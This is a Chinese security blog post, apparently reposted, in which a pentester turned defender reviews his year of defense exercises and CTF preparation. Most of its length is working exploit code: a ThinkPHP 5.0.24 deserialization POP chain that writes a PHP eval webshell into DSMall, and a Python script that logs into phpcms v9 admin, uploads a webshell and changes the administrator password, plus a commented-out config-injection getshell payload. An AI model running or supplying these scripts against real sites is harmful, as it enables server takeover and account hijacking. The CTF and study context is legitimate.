将近四个月没发文章,因为工作确实挺忙,另外甲方工作技术能力提升会稍微慢点,入职四个月可以分为两个阶段,8-11月忙于hw,11到现在忙于CTF。
第一阶段
8月入职以来,单位培训一周就开始忙于hw,说来也是可笑,去年还是在攻击队搞渗透,今年就变成防守方。单位3月就开始忙于hw,上安全设备,重新部署一些架构,惭愧没有早来实习。说说正式hw做的一些工作,单位领导知道我是攻击队出来的,交给我第一个任务就是对薄弱网络区域进行渗透测试,我带着厂商的几个兄弟,确实也挖到不少漏洞,具体漏洞就不细说了,搞到一台服务器看网卡是通生产网的,当时兴奋的不行,可惜那台只是配了IP并没有加路由,出了一份渗透报告,getshell了不少也算是能给领导交差。正式hw阶段,开始不熟悉单位的网络架构,安全设备部署情况,也是厂商兄弟和同事帮忙介绍,巧的是得到原单位抽签抽到我们,快向原单位同事打探下情况,是否准备0day,更巧的是另一个同事离职去xx当负责人派的小弟来我们这帮忙,后面正式hw工作,主要还是负责应急、溯源和盯监控设备,还写了一份内存马查杀的手册。期间主要还是熟悉单位的业务架构,不得不佩服小hw时,xxx单位的渗透报告,着实是学了一手,所有渗透手法、知识点全都具备,如何能够在短时间串联起来直捣黄龙才是渗透最难的,期间也出了很值得学习的溯源报告,最终成绩也是相当可以,最值得一提的是,工作确实认识好多厂商厉害的大佬,id就不说了,也认识了北邮的朋友搞java web的,跟他也是相谈甚欢,所有研究方向和想法基本一致,后来也是帮他内推了好多各大实验室,基本复刻我去年走的路,最终也是成功进入到梦寐以求的一个单位,不得不佩服小兄弟刚20出头能力已经相当可以了,以后前途不可估量。
第二阶段
hw结束后开始忙于扫尾工作,写各种报告、总结,最近结果也是刚揭晓,履历上可以加上一笔了。后面组长将渗透测试的活交给我来做,开始还是身体力行亲自做,后来驻场的人过来,把这些活安排下去了,u1s1做这种系统黑盒测试,对技术提升就那样吧,遇到难搞的系统才会亲自上阵。还有对工作的感触,就是有的师傅是用心在做安全,有的却是在混日子,开始想着驻场一年带带他,来年技术能力有个质的飞跃,后来发现他确实只是混日子,算了对某些人确实没太多期望,后面也不想跟他交流太多。有的驻场比较灵性也听话,后面想着带着他把codeql在单位落地,搞一个自研的代码审计工具,挖一挖简单漏洞。后来就准备单位组织的CTF,期间同事写了种马的框架,awd线下的框架,waf和文件监控程序,内网渗透的check-ist、awd-checklist,这些写的工具暂不开源了,有机会发出来。发现今年线下赛和以往明显不同,考的基础代码审计能力,不存在以前的手速大赛情况了。赛题也比较基础了。唯一一个DSMall系统利用ThinkPHP5.0.24 POP链反序列化写shell还是挺有意思的。具体分析看下面吧,在linux绕过死亡exit,poc贴下面了,巨坑的是这个poc在MAC上写shell写不进去。
说说以后的工作计划吧。
1、手头几本书看完(安恒红宝书,0day攻防)
2、pwn捡起来,出得新书看起来。
3、codeql落地,写一款自研的代码审计的扫描器。
4、单位安全运营和sdl工作。
<?php
namespace think\process\pipes;
use think\model\Pivot;
class Pipes{
}
class Windows extends Pipes{
private $files = [];
function __construct(){
$this->files = [new Pivot()];
}
}
namespace think\model;#Relation
use think\db\Query;
abstract class Relation{
protected $selfRelation;
protected $query;
function __construct(){
$this->selfRelation = false;
$this->query = new Query();#class Query
}
}
namespace think\model\relation;#OneToOne HasOne
use think\model\Relation;
abstract class OneToOne extends Relation{
function __construct(){
parent::__construct();
}
}
class HasOne extends OneToOne{
protected $bindAttr = [];
function __construct(){
parent::__construct();
$this->bindAttr = ["no","123"];
}
}
namespace think\console;#Output
use think\session\driver\Memcached;
class Output{
private $handle = null;
protected $styles = [];
function __construct(){
$this->handle = new Memcached();//目的调用其write()
$this->styles = ['getAttr'];
}
}
namespace think;#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
abstract class Model{
protected $append = [];
protected $error;
public $parent;#修改处
protected $selfRelation;
protected $query;
protected $aaaaa;
function __construct(){
$this->parent = new Output();#Output对象,目的是调用__call()
$this->append = ['getError'];
$this->error = new HasOne();//Relation子类,且有getBindAttr()
$this->selfRelation = false;//isSelfRelation()
$this->query = new Query();
}
}
namespace think\db;#Query
use think\console\Output;
class Query{
protected $model;
function __construct(){
$this->model = new Output();
}
}
namespace think\session\driver;#Memcached
use think\cache\driver\File;
class Memcached{
protected $handler = null;
function __construct(){
$this->handler = new File();//目的调用File->set()
}
}
namespace think\cache\driver;#File
class File{
protected $options = [];
protected $tag;
function __construct(){
$this->options = [
'expire' => 0,
'cache_subdir' => false,
'prefix' => '',
'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
'data_compress' => false,
];
$this->tag = true;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model{
}
use think\process\pipes\Windows;
$obj=new Windows();
$res= ds_encrypt(base64_encode(serialize($obj)));
// $res = base64_encode(serialize($obj));
echo $res;
function ds_encrypt($txt, $key = '')
{
define('TIMESTAMP',time());
if (empty($txt))
return $txt;
if (empty($key))
$key = md5('a2382918dbb49c8643f19bc3ab90ecf9');
$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.";
$ikey = "-x6g6ZWm2G9g_vr0Bo.pOq3kRIxsZ6rm";
$nh1 = rand(0, 64);
$nh2 = rand(0, 64);
$nh3 = rand(0, 64);
$ch1 = $chars{$nh1};
$ch2 = $chars{$nh2};
$ch3 = $chars{$nh3};
$nhnum = $nh1 + $nh2 + $nh3;
$knum = 0;
$i = 0;
while (isset($key{$i}))
$knum += ord($key{$i++});
$mdKey = substr(md5(md5(md5($key . $ch1) . $ch2 . $ikey) . $ch3), $nhnum % 8, $knum % 8 + 16);
$txt = base64_encode(TIMESTAMP . '_' . $txt);
$txt = str_replace(array('+', '/', '='), array('-', '_', '.'), $txt);
$tmp = '';
$j = 0;
$k = 0;
$tlen = strlen($txt);
$klen = strlen($mdKey);
for ($i = 0; $i < $tlen; $i++) {
$k = $k == $klen ? 0 : $k;
$j = ($nhnum + strpos($chars, $txt{$i}) + ord($mdKey{$k++})) % 64;
$tmp .= $chars{$j};
}
$tmplen = strlen($tmp);
$tmp = substr_replace($tmp, $ch3, $nh2 % ++$tmplen, 0);
$tmp = substr_replace($tmp, $ch2, $nh1 % ++$tmplen, 0);
$tmp = substr_replace($tmp, $ch1, $knum % ++$tmplen, 0);
return $tmp;
}
下面写的phpcms 后台认证的getshell poc,输入验证码cookie,ip就能打,实际写这个就是为了写写认证后的poc编写,requests.utils.add_dict_to_cookiejar(session.cookies, {'PHPSESSID': cookie})会给以后的session都添加上cookie,
下面是一次session会话会添加cookie。
mycookie = { "PHPSESSID":"56v9clgo1kdfo3q5q8ck0aaaaa" }
x = requests.session()
x.get("http://127.0.0.1:80",cookies = mycookie)
调试用:
print(dict(session.cookies)) //请求前的cookie
print(dict(res1.cookies)) //请求后的cookie
#encoding: utf-8
#验证码图片地址:http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&a=login
import requests
import re
import random
def login(ip,code,cookie):
session = requests.session()
requests.utils.add_dict_to_cookiejar(session.cookies, {'PHPSESSID': cookie})
burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=index&a=login&dosubmit=1"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://172.28.161.163", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&a=login&pc_hash=", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}
burp0_data = {"dosubmit": '', "username": "phpcms", "password": "phpcms", "code": code}
res1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
print(re.findall('330px">(.+)</div>',res1.text)[0])
# print(dict(session.cookies))
# print(dict(res1.cookies))
burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=index&a=public_main"
burp0_headers = {"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&pc_hash",
"Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Connection": "close"}
res2 = session.get(burp0_url, headers=burp0_headers)
# print(dict(session.cookies))
# print(dict(res2.cookies))
pc_hash = re.findall('var pc_hash = \'(.+)\';',res2.text)[0]
print('pc_hash: '+pc_hash)
# print(res2.text)
#upload getshell
modelname = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
tablename = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
description = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=member&c=member_model&a=add"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.155.1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryXKC2cbu1uVQg3Tr3", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.155.1/phpcms_v9/index.php?m=member&c=member_model&a=add&pc_hash=gGF834", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}
burp0_data = "------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[modelname]\"\r\n\r\n"+modelname+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[tablename]\"\r\n\r\n"+tablename+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[description]\"\r\n\r\n"+description+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"model_import\"; filename=\"1.txt\"\r\nContent-Type: text/plain\r\n\r\narray(1);$b=file_put_contents(\".cache202012047548.php\",'<?php eval($_REQUEST[z]);?>');\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"dosubmit\"\r\n\r\n\xe6\x8f\x90\xe4\xba\xa4\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"pc_hash\"\r\n\r\n"+pc_hash+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3--\r\n"
res3 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
print(res3.text)
# change_pwd
burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=admin_manage&a=public_edit_pwd"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.199.181",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": "http://192.168.199.181//phpcms_v9/index.php?m=admin&c=admin_manage&a=public_edit_pwd&menuid=971&pc_hash="+pc_hash,
"Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Connection": "close"}
burp0_data = {"info[userid]": "1", "info[username]": "phpcms", "old_password": "phpcms", "new_password": "nongxinyin",
"new_pwdconfirm": "nongxinyin", "dosubmit": "\xe6\x8f\x90\xe4\xba\xa4", "pc_hash": pc_hash}
res5 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
# print(res5.text)
print(re.findall('max-width:330px">(.+)</div>',res5.text)[0])
#
#modify system.config getshell
# burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=setting&a=save"
# burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://172.28.161.163",
# "Content-Type": "application/x-www-form-urlencoded",
# "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
# "Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=setting&a=init&&tab=2&menuid=979&pc_hash="+pc_hash,
# "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
# "Connection": "close"}
# burp0_data = {"setting[admin_email]": "[email protected]", "setting[category_ajax]": '', "setconfig[gzip]": "1",
# "setconfig[attachment_stat]": "1", "setconfig[js_path]": "http://172.28.161.163/phpcms_v9/statics/js/",
# "setconfig[css_path]": "http://172.28.161.163/phpcms_v9/statics/css/",
# "setconfig[img_path]": "http://172.28.161.163/phpcms_v9/statics/images/",
# "setconfig[upload_url]": "http://172.28.161.163/phpcms_v9/uploadfile/", "setconfig[admin_log]": "1",
# "setconfig[errorlog]": "1", "setting[errorlog_size]": "20", "setting[maxloginfailedtimes]": "8",
# "setting[minrefreshtime]": "2", "setconfig[admin_url]": '', "setconfig[phpsso]": "1",
# "setconfig[phpsso_appid]": "1",
# "setconfig[phpsso_api_url]": "http://172.28.161.163/phpcms_v9/phpsso_server",
# "setconfig[phpsso_auth_key]": "NHeSSQfQfxsXQCPcxs99EtYSDiGI6pey", "setconfig[phpsso_version]": "1",
# "setting[mail_type]": "1", "setting[mail_server]": "smtp.qq.com", "setting[mail_port]": "25",
# "setting[mail_from]": "[email protected]", "setting[mail_auth]": "1",
# "setting[mail_user]": "[email protected]", "setting[mail_password]": '', "mail_to": '',
# "setconfig[snda_akey]": "\\',@@eval($_POST[z]),//", "setconfig[snda_skey]": '',
# "setconfig[sina_akey]": '', "setconfig[sina_skey]": '', "setconfig[qq_akey]": '',
# "setconfig[qq_skey]": '', "setconfig[qq_appid]": '', "setconfig[qq_appkey]": '',
# "setconfig[qq_callback]": '', "dosubmit": "\xe6\x8f\x90\xe4\xba\xa4", "pc_hash": pc_hash }
# res4 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
# # print(res4.text)
# print(re.findall('-width:330px">(.+)</div>',res4.text)[0])
login('192.168.155.1','anwz','aic2c5br7fmmak60b28fu0h422')
https://www.anquanke.com/post/id/203461
https://xz.aliyun.com/t/7082
https://github.com/Ares-X/VulWiki/blob/a8a7d4d4d1530681e5b7f18daf7f471f7ff5c010/Web安全/Thinkphp/Thinkphp 反序列化漏洞/Thinkphp 5.0.24 反序列化漏洞.md
https://xz.aliyun.com/t/7457
https://blog.csdn.net/qq_45691294/article/details/109279879
文章来源: http://www.cnblogs.com/afanti/p/14112054.html
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh